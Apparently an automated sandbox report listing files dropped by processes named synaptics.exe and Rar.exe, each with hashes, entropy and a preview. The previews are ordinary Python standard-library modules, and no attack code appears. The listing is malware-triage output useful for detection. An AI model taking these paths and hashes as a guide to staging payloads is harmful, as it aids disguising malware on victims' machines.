                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*m+Z+..z.d.d.l,Z,W.n...e-y.......d.Z.Y.n.w.d.Z.g.d...Z/d.e.j0d.d.......Z1d.a2d.e.j3f.d.d.d.d.d...d.d...Z4d.d...Z5g.Z6d.d.d...Z7d.d...Z8e..9d.e.j:..Z;d.d...Z<G.d.d...d...Z=G.d.d...d...Z>d.d...Z?G.d.d...d...Z@G.d.d ..d e@..ZAG.d!d"..d"e@..ZBG.d#d$..d$e@..ZCd%d&..ZDG.d'd(..d(e@..ZEG.d)d*..d*..ZFG.d+d,..d,eF..ZGG.d-d...d.eG..ZHG.d/d0..d0..ZIG.d1d2..d2eIe@..ZJG.d3d4..d4eIe@..ZKe.jLZMG.d5d6..d6..ZNG.d7d8..d8e@eN..ZOG.d9d:..d:e@eN..ZPG.d;d<..d<e@..ZQG.d=d>..d>eQ..ZReSe.jTd?....rtG.d@dA..dAeQ..ZUe/.VdA....G.dBdC..dCe@..ZWG.dDdE..dEe@..ZXdFdG..ZYdHdI..ZZG.dJdK..dKe@..Z[dLdM..Z\G.dNdO..dOe@..Z]G.dPdQ..dQe]..Z^G.dRdS..dSe@..Z_dTZ`e.jadUk...r.d.dVlbmcZcmdZd..n.dWdX..ZcdYdZ..Zdi.ZeG.d[d\..d\..ZfG.d]d^..d^ef..Zgd.ahd_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):71349
                                                                                                                                                                                                                                  Entropy (8bit):5.431899423681214
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:6ZcvBKtoBL6sxVuJaP6IMydlT2rQuyHuQfaC6x4oinfTQcJ0:6WgtU6AI663Qu46ufMY0
                                                                                                                                                                                                                                  MD5:841215D963B9F4E5BE6F986BB49746D6
                                                                                                                                                                                                                                  SHA1:AFA3F74A012AFBE5BD126BDD9CF3BB7AF758372C
                                                                                                                                                                                                                                  SHA-256:E510CC16F0FA6EBFC837752A495A2CF7CEA7A16EF1A92D0617B2DD62710FBF97
                                                                                                                                                                                                                                  SHA-512:9E7DBEC2389E787A78B7B93CBFCCCA8B8602EB7D0B07B3DEFC0354695A00335F4777D74BB0FC2A9AB8001A44C5E988BA0CBB334BB1CBD5FF9BB9F5003FD6DF82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*m+Z+..z.d.d.l,Z,W.n...e-y.......d.Z.Y.n.w.d.Z.g.d...Z/d.e.j0d.d.......Z1d.a2d.e.j3f.d.d.d.d.d...d.d...Z4d.d...Z5g.Z6d.d.d...Z7d.d...Z8e..9d.e.j:..Z;d.d...Z<G.d.d...d...Z=G.d.d...d...Z>d.d...Z?G.d.d...d...Z@G.d.d ..d e@..ZAG.d!d"..d"e@..ZBG.d#d$..d$e@..ZCd%d&..ZDG.d'd(..d(e@..ZEG.d)d*..d*..ZFG.d+d,..d,eF..ZGG.d-d...d.eG..ZHG.d/d0..d0..ZIG.d1d2..d2eIe@..ZJG.d3d4..d4eIe@..ZKe.jLZMG.d5d6..d6..ZNG.d7d8..d8e@eN..ZOG.d9d:..d:e@eN..ZPG.d;d<..d<e@..ZQG.d=d>..d>eQ..ZReSe.jTd?....rtG.d@dA..dAeQ..ZUe/.VdA....G.dBdC..dCe@..ZWG.dDdE..dEe@..ZXdFdG..ZYdHdI..ZZG.dJdK..dKe@..Z[dLdM..Z\G.dNdO..dOe@..Z]G.dPdQ..dQe]..Z^G.dRdS..dSe@..Z_dTZ`e.jadUk...r.d.dVlbmcZcmdZd..n.dWdX..ZcdYdZ..Zdi.ZeG.d[d\..d\..ZfG.d]d^..d^ef..Zgd.ahd_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3478
                                                                                                                                                                                                                                  Entropy (8bit):4.754471208806924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:4BaL9CzkpnMEDq/vnacKhRVH+nRsxv5C+8/15dzjT:Lxuneq33ERVHNvCl/9T
                                                                                                                                                                                                                                  MD5:AA2152E549D2BEFD6986D4C46C6C613D
                                                                                                                                                                                                                                  SHA1:87579B09E392F5EE2EC9114A8E366315802E0AA5
                                                                                                                                                                                                                                  SHA-256:1C25A8D457C09611D09C1D54A5BAA298410FE135CE878B6F3B60E2941B40AAE9
                                                                                                                                                                                                                                  SHA-512:8880C64849D12EB032797711953C61B40EC07BB59C8F87701AF9A681A7B808805275EC9355F56FFE8656753CF2A52FE34E13107EEB4CFE2BC8373274B7842376
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sZ...d.Z.d.d.l.Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).a....Response classes used by urllib...The base class, addbase, defines a minimal file-like interface,.including read() and readline(). The typical response object is an.addinfourl instance, which defines an info() method that returns.headers and a geturl() method that returns the url.......N)...addbase..addclosehook..addinfo..addinfourlc........................s8...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.).r....zOBase class for addinfo and addclosehook. Is a good idea for garbage collection.c........................s ...t.t.|...j.|.d.d.d.....|.|._.d.S.).Nz.<urllib response>F)...delete)...superr......__init__..fp)...selfr........__class__...1C:\Users\Public\M20EKMMEH2\lib\urllib\response.pyr........s........z.addbase.__init__c....................C...s....d.|.j.j.t.|...|.j.f...S.).Nz.<%s at %r whose fp = %r>).r......__name__..id..file
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2489
                                                                                                                                                                                                                                  Entropy (8bit):4.639470944288693
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:vxZuQSkq8fQydcJR+j/TQ8/qcISXaf7CXy2ravbTl5AJ:vx0QSkq8Yyj/TQ/cISKjSobAJ
                                                                                                                                                                                                                                  MD5:03686114721E9382F02E9F7BA58C6D75
                                                                                                                                                                                                                                  SHA1:010D984B477B36EE38BC6F0A3C769D1DE4C8B38A
                                                                                                                                                                                                                                  SHA-256:17E896A26FF42405F58189DE81A531B17630398CFBC7C9E2B72ED1AC472ACF01
                                                                                                                                                                                                                                  SHA-512:0CB25AB2DBAD2811AEBF5186FD5D5996BC66AE113D2F19EE56F397840E9F630D224829969774D91E00168105B6DB800B707C15A2CB898FA75BA91348B9D3922F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Exception classes raised by urllib.....The base exception class is URLError, which inherits from OSError. It..doesn't define any behavior of its own, but is the base class for all..exceptions defined in this package.....HTTPError is an exception class that is also a valid HTTP response..instance. It behaves this way because HTTP protocol errors are valid..responses, with a status code, headers, and a body. In some contexts,..an application may want to handle an exception like a regular..response..."""..import io..import urllib.response....__all__ = ['URLError', 'HTTPError', 'ContentTooShortError']......class URLError(OSError):.. # URLError is a sub-type of OSError, but it doesn't share any of.. # the implementation. need to override __init__ and __str__... # It sets self.args for compatibility with other OSError.. # subclasses, but args doesn't have the typical format with errno in.. # slot 0 and strerror in slot 1. This may be better than nothing... def __ini
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):43463
                                                                                                                                                                                                                                  Entropy (8bit):4.67743372821875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:z15Re+AP2AZ6pDPMSejN/3vzXZmErW63SMZ/dqH9qLc48nGLDwzKiu4U5FRyFxXf:z1u+bRoRlpZY0LoKD95FkFxP
                                                                                                                                                                                                                                  MD5:93EED57FB7B8E0BA840402C2189F2501
                                                                                                                                                                                                                                  SHA1:7BAEE34ECCF9EB12A2ED4E18033A395E4B19253A
                                                                                                                                                                                                                                  SHA-256:A70A09CD0CF91D735AE6B121D0F790FC9A8F497918794A72485F1DEAB360DBC2
                                                                                                                                                                                                                                  SHA-512:5904086E7C9A325083554FD862ED7868C147C33B137AA38DA3F4C9E3E2FB1E15001307130364000AF71BF6ACA89B92B1BEBA828B6AE721F1CC2CF20DC519569D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Parse (absolute and relative) URLs.....urlparse module is based upon the following RFC specifications.....RFC 3986 (STD66): "Uniform Resource Identifiers" by T. Berners-Lee, R. Fielding..and L. Masinter, January 2005.....RFC 2732 : "Format for Literal IPv6 Addresses in URL's by R.Hinden, B.Carpenter..and L.Masinter, December 1999.....RFC 2396: "Uniform Resource Identifiers (URI)": Generic Syntax by T...Berners-Lee, R. Fielding, and L. Masinter, August 1998.....RFC 2368: "The mailto URL scheme", by P.Hoffman , L Masinter, J. Zawinski, July 1998.....RFC 1808: "Relative Uniform Resource Locators", by R. Fielding, UC Irvine, June..1995.....RFC 1738: "Uniform Resource Locators (URL)" by T. Berners-Lee, L. Masinter, M...McCahill, December 1994....RFC 3986 is considered the current standard and any future changes to..urlparse module should conform with it. The urlparse module is..currently not entirely compliant with this RFC due to defacto..scenarios for parsing, and for backward compa
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):104880
                                                                                                                                                                                                                                  Entropy (8bit):4.4616704457405785
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:hhI8oMeTXIt9w6jWbSdYOt/su7pxtzQhjortW7OyjarA05XfJtwTJTL6KvS4DGlm:4MeTX49w6jWbSd/t/su7pxtzQh0rtW7n
                                                                                                                                                                                                                                  MD5:AFE01E917CE572825DA95E2F73C3A182
                                                                                                                                                                                                                                  SHA1:B594E4DF01E500977FCE80A72D5D394EB88936F2
                                                                                                                                                                                                                                  SHA-256:A07AF23F83F01C5567676BDE1E4CD9FA58161B1D2BBCE00DB630AE881A011416
                                                                                                                                                                                                                                  SHA-512:E54F110C9232B72EE23C7B3B35D8FB09B6223372EEF98F7B82092F8912379734F45CCC01DDE6822D2C302E9EAC7E36B0A15A65BA62B1674262184C462EF414F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""An extensible library for opening URLs using a variety of protocols....The simplest way to use this module is to call the urlopen function,..which accepts a string containing a URL or a Request object (described..below). It opens the URL and returns the results as file-like..object; the returned object has some extra methods described below.....The OpenerDirector manages a collection of Handler objects that do..all the actual work. Each Handler implements a particular protocol or..option. The OpenerDirector is a composite object that invokes the..Handlers needed to open the requested URL. For example, the..HTTPHandler performs HTTP GET and POST requests and deals with..non-error returns. The HTTPRedirectHandler automatically deals with..HTTP 301, 302, 303 and 307 redirect errors, and the HTTPDigestAuthHandler..deals with digest authentication.....urlopen(url, data=None) -- Basic usage is the same as original..urllib. pass the url and optionally data to post to an HTTP URL, and
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2445
                                                                                                                                                                                                                                  Entropy (8bit):4.431974454129167
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:r4BbvTGvQS07lPgWWdq9tsrdyW19ej5wkwBkvR:MBzaQS07lY5cjtWywkwBkZ
                                                                                                                                                                                                                                  MD5:D531F0A30312F650F962EAA31652AEBB
                                                                                                                                                                                                                                  SHA1:A565B2AB6F6A05F0681B62B5E2E77B9BC25D3683
                                                                                                                                                                                                                                  SHA-256:3B79834FB777BCC3601B05C8A2BBFAB1A72BF99B10E5A5D2C20A7C3A4583D0CF
                                                                                                                                                                                                                                  SHA-512:25BBA9683CC29296DD103473FBDC24CF7037FCC9736494DA749B3BB9A4189B108B2CDC586AEB923BF2B48D147FFBB306D073F2A1BB1430599B8AE74F6CB629E6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Response classes used by urllib.....The base class, addbase, defines a minimal file-like interface,..including read() and readline(). The typical response object is an..addinfourl instance, which defines an info() method that returns..headers and a geturl() method that returns the url..."""....import tempfile....__all__ = ['addbase', 'addclosehook', 'addinfo', 'addinfourl']......class addbase(tempfile._TemporaryFileWrapper):.. """Base class for addinfo and addclosehook. Is a good idea for garbage collection.""".... # XXX Add a method to expose the timeout on the underlying socket?.... def __init__(self, fp):.. super(addbase, self).__init__(fp, '<urllib response>', delete=False).. # Keep reference around as this was part of the original API... self.fp = fp.... def __repr__(self):.. return '<%s at %r whose fp = %r>' % (self.__class__.__name__,.. id(self), self.file).... def __enter__(self):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9697
                                                                                                                                                                                                                                  Entropy (8bit):4.15994740890475
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:LEvpw5Ct9tcVd/2/paTJqSXkkOFGAiRiH57f/ivoiqN9/qVRjmGSEBaL/KK8Wh/R:46Ct9tcVFTJqF7fOQoVVB0GK8WP3
                                                                                                                                                                                                                                  MD5:A024DF2786691CF05997954F37178BE0
                                                                                                                                                                                                                                  SHA1:617ACE96E03067AD58490972A1E2122885C19813
                                                                                                                                                                                                                                  SHA-256:05CED87A4F681014F6A5BF7370680CDCE02B392A559832CB6D2AA2F910F7D5EB
                                                                                                                                                                                                                                  SHA-512:FA3406801D1D39B9BFCF052A473F297E2782F19F18A5C24139E94088F5AAABC15D1EFE7269E4E7426E13DD4DA0BC92F0A9C661B3325CEE171E3C910EA6820793
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" robotparser.py.... Copyright (C) 2000 Bastian Kleineidam.... You can choose between two licenses when using this package:.. 1) GNU GPLv2.. 2) PSF license for Python 2.2.... The robots.txt Exclusion Protocol is implemented as specified in.. http://www.robotstxt.org/norobots-rfc.txt.."""....import collections..import urllib.parse..import urllib.request....__all__ = ["RobotFileParser"]....RequestRate = collections.namedtuple("RequestRate", "requests seconds")......class RobotFileParser:.. """ This class provides a set of methods to read, parse and answer.. questions about a single robots.txt file..... """.... def __init__(self, url=''):.. self.entries = [].. self.sitemaps = [].. self.default_entry = None.. self.disallow_all = False.. self.allow_all = False.. self.set_url(url).. self.last_checked = 0.... def mtime(self):.. """Returns the time the robots.txt file was last fetched..... This i
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7165
                                                                                                                                                                                                                                  Entropy (8bit):4.635646219278868
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:IqFD4C1j1e5e65PARhQ3E2Q/N56npYv9EVBDgcDrkONFhnlO7c0pz:1zj1Qe8PARQEH/6nSVEVve7c0pz
                                                                                                                                                                                                                                  MD5:CDE9C803E2AC98627170F6CDD8030520
                                                                                                                                                                                                                                  SHA1:5AF6EC7A8B5D787F56FCE7B01F9D103B5D22C3A5
                                                                                                                                                                                                                                  SHA-256:35CD5F9AB4611102799F21E7EFFA5F31EFEE56826E0383F59BAFD27BB3598B9A
                                                                                                                                                                                                                                  SHA-512:942A451A97BD6099C2608685E2097588527627FB1825127E622BA8359E1C104205F89036118241DFB44309077DFE818D703F91116D537A235AFD0B04F3C92D0F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#! /usr/bin/env python3....# Copyright 1994 by Lance Ellinghouse..# Cathedral City, userfornia Republic, United States of America...# All Rights Reserved..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Lance Ellinghouse..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# LANCE ELLINGHOUSE DISCLAIMS ALL WARRANTIES WITH REGARD TO..# THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND..# FITNESS, IN NO EVENT SHALL LANCE ELLINGHOUSE CENTRUM BE LIABLE..# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28233
                                                                                                                                                                                                                                  Entropy (8bit):4.867217589417424
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:hq/jU0Qc7Ad2XLCqXcppi4D9rGcMyiNB/2TFbVjjh5:hq/I0QcUcX+qXcppi7Ijh5
                                                                                                                                                                                                                                  MD5:ECA958D6B61E6FA8319F071C7D3CA253
                                                                                                                                                                                                                                  SHA1:657398649832132808FD5DDB3B05240525758535
                                                                                                                                                                                                                                  SHA-256:AC5DD1BFF2AC117CF1D1A9F86131D2E93C935CA59CF0A89D6ABB05295EDF007B
                                                                                                                                                                                                                                  SHA-512:D856FBADF451F3C6126F6EC65CFBD31A240496EFA88E77FCEB4298618F8192A07523C9360225C48404EDF12E6E71EA0C54B96AB7A9844AB51AB3C23D35D74B73
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:r"""UUID objects (universally unique identifiers) according to RFC 4122.....This module provides immutable UUID objects (class UUID) and the functions..uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5..UUIDs as specified in RFC 4122.....If all you want is a unique ID, you should probably call uuid1() or uuid4()...Note that uuid1() may compromise privacy since it creates a UUID containing..the computer's network address. uuid4() creates a random UUID.....Typical usage:.... >>> import uuid.... # make a UUID based on the host ID and current time.. >>> uuid.uuid1() # doctest: +SKIP.. UUID('a8098c1a-f86e-11da-bd1a-00112444be1e').... # make a UUID using an MD5 hash of a namespace UUID and a name.. >>> uuid.uuid3(uuid.NAMESPACE_DNS, 'python.org').. UUID('6fa459ea-ee8a-3ca4-894e-db77e160355e').... # make a random UUID.. >>> uuid.uuid4() # doctest: +SKIP.. UUID('16fd2706-8baf-433b-82eb-8c7fada847da').... # make a UUID using a SHA-1
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20237
                                                                                                                                                                                                                                  Entropy (8bit):4.456113748681824
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:VIGjFGnRqmpRXDeU+e6TNkedNr/vFx0BWSvs31I:VI4GnRqm2xtOBDs31I
                                                                                                                                                                                                                                  MD5:75CDCBE366D13B7C463830D8FAF2DBE5
                                                                                                                                                                                                                                  SHA1:BBAA1236B789B5D2511A938A604361E32AEA6D6F
                                                                                                                                                                                                                                  SHA-256:2B0C512178EAF53227CD7D336FBC5E055509048B8E1D9CE7CBB33D56B968D4BA
                                                                                                                                                                                                                                  SHA-512:E9B77E373F793355BA7822C39D141054B13772D4C2124E95CB8E9FFBC684D9AB2107FFDB5C9C8009E4541CD4F1169D3AEF825AB398FB73151BA60D05963EA045
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Python part of the warnings subsystem."""....import sys......__all__ = ["warn", "warn_explicit", "showwarning",.. "formatwarning", "filterwarnings", "simplefilter",.. "resetwarnings", "catch_warnings"]....def showwarning(message, category, filename, lineno, file=None, line=None):.. """Hook to write a warning to a file; replace if you like.""".. msg = WarningMessage(message, category, filename, lineno, file, line).. _showwarnmsg_impl(msg)....def formatwarning(message, category, filename, lineno, line=None):.. """Function to format a warning the standard way.""".. msg = WarningMessage(message, category, filename, lineno, None, line).. return _formatwarnmsg_impl(msg)....def _showwarnmsg_impl(msg):.. file = msg.file.. if file is None:.. file = sys.stderr.. if file is None:.. # sys.stderr is None when run with pythonw.exe:.. # warnings get lost.. return.. text = _formatwarnmsg(msg).. try:..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18517
                                                                                                                                                                                                                                  Entropy (8bit):4.368436724087491
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:l9EqMa1yctYScMTScRDpMZNCLSz7aYWTRhbtsKeU0hgIidMOhK58v36W1:lHM8ycyStUILSz7aYWTRhbtss0h9631
                                                                                                                                                                                                                                  MD5:D55129AF4810C592A87D75480D44C73F
                                                                                                                                                                                                                                  SHA1:A15D2AD39D8264C6851C5445CE08FC7A03B4426C
                                                                                                                                                                                                                                  SHA-256:0CC87A2E89B8B3AF9470A8EF92944EDEFD4A05E1D9ADEA6F2326F9C8E0AE78FC
                                                                                                                                                                                                                                  SHA-512:89B648FAB150243609A06722574434B09280941DF74845CE3B4A730A1EA55313565E32B4D439BD16B41EC272505C87C025CEBEA60026682720964790658E911D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Stuff to parse WAVE files.....Usage.....Reading WAVE files:.. f = wave.open(file, 'r')..where file is either the name of a file or an open file pointer...The open file pointer must have methods read(), seek(), and close()...When the setpos() and rewind() methods are not used, the seek()..method is not necessary.....This returns an instance of a class with the following public methods:.. getnchannels() -- returns number of audio channels (1 for.. mono, 2 for stereo).. getsampwidth() -- returns sample width in bytes.. getframerate() -- returns sampling frequency.. getnframes() -- returns number of audio frames.. getcomptype() -- returns compression type ('NONE' for linear samples).. getcompname() -- returns human-readable version of.. compression type ('not compressed' linear samples).. getparams() -- returns a namedtuple consisting of all of the.. above in th
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22235
                                                                                                                                                                                                                                  Entropy (8bit):4.290222224385809
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:eJT8HzCblJPEwGmyZVPjY8c4jDyCYAym+TiH9QHORqQeIXjWi86wow0wHRegJn9d:aVEPOpRUBzSmOjJnCoWaDf3DjJnRKs
                                                                                                                                                                                                                                  MD5:77D4C5645BC5F43355F2490B0DB5330D
                                                                                                                                                                                                                                  SHA1:C1D67552A3A49361A322BFCF9E4A925DE3E7AB57
                                                                                                                                                                                                                                  SHA-256:666C9958ACF3D1A307170E7E6DF53BB064C63EA4995627E870552EFA088D9A9D
                                                                                                                                                                                                                                  SHA-512:5A4F5864BA0813736B171CF90B90F971455D53236EE0324578CBE211BFCCB30EED11334B388C5D7D6B412D6ED25694F56948E31F440B4FDFF0C1FA76CDD5D38F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Weak reference support for Python.....This module is an implementation of PEP 205:....https://www.python.org/dev/peps/pep-0205/.."""....# Naming convention: Variables named "wr" are weak reference objects;..# they are called this instead of "ref" to avoid name collisions with..# the module-global ref() function imported from _weakref.....from _weakref import (.. getweakrefcount,.. getweakrefs,.. ref,.. proxy,.. CallableProxyType,.. ProxyType,.. ReferenceType,.. _remove_dead_weakref)....from _weakrefset import WeakSet, _IterationGuard....import _collections_abc # Import after _weakref to avoid circular import...import sys..import itertools....ProxyTypes = (ProxyType, CallableProxyType)....__all__ = ["ref", "proxy", "getweakrefcount", "getweakrefs",.. "WeakKeyDictionary", "ReferenceType", "ProxyType",.. "CallableProxyType", "ProxyTypes", "WeakValueDictionary",.. "WeakSet", "WeakMethod", "finalize"]......_collections_abc.Se
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24962
                                                                                                                                                                                                                                  Entropy (8bit):4.4821654414982
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Dw+gtAvw1CThtWcOGsmCZXt11GhVqbzkeZEyF:DwXyhccVCZXiDO
                                                                                                                                                                                                                                  MD5:C6235576ACFA074E0602F8286D6AE967
                                                                                                                                                                                                                                  SHA1:E7D5740885F262528495F54F1C29E991C4C878E7
                                                                                                                                                                                                                                  SHA-256:91DE52B10A90BC40792725B914E2184671E2E2EE0D32E3BA6B1EC027E63BDC51
                                                                                                                                                                                                                                  SHA-512:1446B528F4A41C4ABC1E532F408CCDA8F4530C37E711E12A80E2141BBEEF4A98A5740EF4B759AFCCFDBD18A2D9FEC7A5A08F0BD87424EB084CF8AF6508A22BE4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#! /usr/bin/env python3.."""Interfaces for launching and remotely controlling web browsers."""..# Maintained by Georg Brandl.....import os..import shlex..import shutil..import sys..import subprocess..import threading....__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]....class Error(Exception):.. pass...._lock = threading.RLock().._browsers = {} # Dictionary of available browser controllers.._tryorder = None # Preference order of available browsers.._os_preferred_browser = None # The preferred browser....def register(name, klass, instance=None, *, preferred=False):.. """Register a browser connector.""".. with _lock:.. if _tryorder is None:.. register_standard_browsers().. _browsers[name.lower()] = [klass, instance].... # Preferred browsers go to the front of the list... # Need to match to the default browser returned by xdg-settings, which.. # may be of the form e.g. "fir
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6154
                                                                                                                                                                                                                                  Entropy (8bit):4.544312365119713
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:l3vVO5EFsFUxepdMJhp1ygk+3PGo7YytCl:l3ujSg0w6GMYywl
                                                                                                                                                                                                                                  MD5:AB44399A4ABB9874B0F2C2D5F9FEA306
                                                                                                                                                                                                                                  SHA1:0E1F67F497D7E3A497A6EBD8ED6DBAEE11A83656
                                                                                                                                                                                                                                  SHA-256:A9043DAD797D72C31A4A01AD4069D83AC894720EF8E72490831676A8517D0853
                                                                                                                                                                                                                                  SHA-512:1B905F86AF613D9AF99E2046AA82EB2C1271C7E2384DF010DBCFEC37736C2CC2592956CEB08DF567FA3CDA12B8135C55E75081727EA258921E4F8FCA6AC6C6EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Implements (a subset of) Sun XDR -- eXternal Data Representation.....See: RFC 1014...."""....import struct..from io import BytesIO..from functools import wraps....__all__ = ["Error", "Packer", "Unpacker", "ConversionError"]....# exceptions..class Error(Exception):.. """Exception class for this module. Use:.... except xdrlib.Error as var:.. # var has the Error instance for the exception.... Public ivars:.. msg -- contains the message.... """.. def __init__(self, msg):.. self.msg = msg.. def __repr__(self):.. return repr(self.msg).. def __str__(self):.. return str(self.msg)......class ConversionError(Error):.. pass....def raise_conversion_error(function):.. """ Wrap any raised struct.errors in a ConversionError. """.... @wraps(function).. def result(self, value):.. try:.. return function(self, value).. except struct.error as e:.. raise ConversionError(e.args[0]) from None.. retur
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Nim source code, ASCII text, with CRLF line terminators
